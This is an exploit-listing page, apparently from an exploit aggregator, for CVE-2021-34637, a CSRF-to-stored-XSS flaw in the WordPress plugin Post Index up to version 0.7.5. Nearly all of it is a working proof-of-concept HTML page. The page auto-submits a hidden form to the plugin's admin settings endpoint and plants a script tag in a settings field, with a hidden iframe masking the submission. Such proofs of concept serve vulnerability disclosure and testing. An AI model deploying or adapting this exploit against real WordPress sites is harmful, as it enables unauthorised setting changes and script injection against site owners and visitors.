Exploit for Post Index <= 0.7.5 - CSRF to Stored XSS CVE-2021-34637

Name: Exploit for Post Index <= 0.7.5 - CSRF to Stored XSS CVE-2021-34637
Rating: 5 (97 reviews)

2021-07-28 | CVSS 6.8

## https://sploitus.com/exploit?id=WPEX-ID:9547040E-E96C-43E3-9EA9-ACF45A300D62
<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title>CSRF PoC</title>
</head>

<body onload="csrfSubmit();">
<form target="dummyfrm" name="evilform" action="
http://localhost/wordpress/wp-admin/options-general.php?page=post-index"
method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="updateSettings" value="1" />
<input type="hidden" name="defaultCategory" value="" />
<input type="hidden" name="showGroupCount" value="1" />
<input type="hidden" name="pageDescription" value="" />
<input type="hidden" name="postLabel[0]" value="posts" />
<input type="hidden" name="postLabel[1]" value="one post" />
<input type="hidden" name="postLabel[2]" value=" posts" />
<input type="hidden" name="infoSeparator[0]" value="also at " />
<input type="hidden" name="infoSeparator[1]" value=", " />
<input type="hidden" name="infoSeparator[2]" value=" and " />
<input type="hidden" name="infoSeparator[3]" value="" />
<input type="hidden" name="infoLinksName[0]"
value=""><script>alert(1);</script>" />
<input type="hidden" name="infoLinksField[0]" value="hoge" />
<input type="hidden" name="submit" value="Save Changes" />
</form>
<iframe src="x" width="1" height="1" name="dummyfrm"
style="visibility:hidden"></iframe>
<script>
function csrfSubmit(){
    let submit =
HTMLFormElement.prototype["submit"].bind(document.evilform);
    submit();
}
</script>

<p>CSRF PoC</p>
</html>